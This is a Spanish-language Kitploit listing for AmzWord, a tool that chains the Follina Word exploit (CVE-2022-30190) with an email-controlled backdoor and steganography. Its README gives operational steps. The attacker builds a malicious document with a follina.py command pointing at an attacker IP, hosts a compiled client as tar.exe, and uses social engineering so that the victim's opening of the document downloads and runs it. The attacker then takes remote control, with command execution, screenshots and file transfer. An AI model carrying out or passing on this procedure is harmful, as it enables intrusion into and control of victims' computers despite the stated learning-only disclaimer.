Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AmzWord — Una cadena de ataque automatizada basada en CVE-2022-30190, 163 backdoor de correo electrónico, y esteganografía de imágenes. | Kitploit
Herramientas/GitHubGitHub/jump-wang-111/amzword
Herramientas de PhishingGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEsteganografíaComando y ControlIngeniería SocialAprendizaje y EducaciónSeguridad de Correo Electrónico
GitHubjump-wang-111/amzword

AmzWord

Una cadena de ataque automatizada basada en CVE-2022-30190, 163 backdoor de correo electrónico, y esteganografía de imágenes.

12hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

AmzWord

Una cadena de ataque automatizada basada en CVE-2022-30190, backdoor de correo electrónico 163 y esteganografía de imágenes.

Agradecimientos a los siguientes repositorios de GitHub, de los cuales referenciamos y modificamos parte del código para integrar y realizar nuestro trabajo:

  • gdog
  • follina
  • virtual-reality

README en chino mira aquí

Requisitos

gdog:

  • Python 2.7
  • Módulo PyCrypto
  • Módulo WMI
  • Módulo Enum34
  • Módulo Netifaces

follina:

  • Python 3.x

Uso y proceso de ataque

  1. Use follina.py para construir un archivo Word malicioso y active la escucha HTTP

    • Puede cambiar el nombre predeterminado y la IP predeterminada en el código
    • También puede usar --ip y --output para especificarlos
    • Consulte follina para obtener información detallada sobre su uso. No hemos modificado la interfaz de uso.
    • Ejemplo: python follina.py --ip 100.100.100.100 --output maldoc.doc
  2. Modifique client.py y gdog.py dentro de gdog y complete la siguiente información

    root@kitploit:~
    gmail_user = 'tu correo'
    gmail_pwd = 'tu contraseña'
    server = "servidor smtp"
    imap_server = 'servidor imap'
    
  3. Compile client.py como tar.exe y colóquelo en /follina/www

  4. Use cualquier método de ingeniería social para enviarlo al objetivo. Tan pronto como la víctima abra el documento de Word, tar.exe se descargará y ejecutará automáticamente.

  5. El atacante ejecuta gdog localmente y envía comandos para controlar la máquina objetivo. Para más detalles sobre su uso, consulte gdog

Observación

  1. Esto es solo una demostración de la implementación de la cadena de ataque. El ejecutable en ejecución puede incluso encontrarse en el administrador de tareas, lo que facilita la observación del efecto. No realizamos ninguna operación como antivirus, ocultación o escalada de privilegios. Por supuesto, en Windows esto no es difícil, ¿verdad?
  2. El proyecto gdog tiene bastante tiempo. Hemos dedicado un gran esfuerzo para que funcione correctamente. Los comandos de control remoto actualmente confirmados incluyen: ejecutar comandos, tomar capturas de pantalla, mostrar ventanas emergentes, apagar el sistema, bloquear la pantalla y transferir archivos. Estas funciones son suficientes para la mayoría de las necesidades.
  3. No sé por qué, pero parece haber algún problema con la búsqueda de ASUNTO en IMAP. No podemos buscar correos electrónicos con el asunto objetivo y el valor devuelto está vacío. Solo podemos recurrir a otros métodos, como leer todos los correos no leídos, filtrar los objetivos y luego marcar los demás como no leídos. Esto puede causar problemas cuando hay muchos usuarios controlados y necesita solución.
  4. Este proyecto es solo con fines de aprendizaje e intercambio.
Descargar herramienta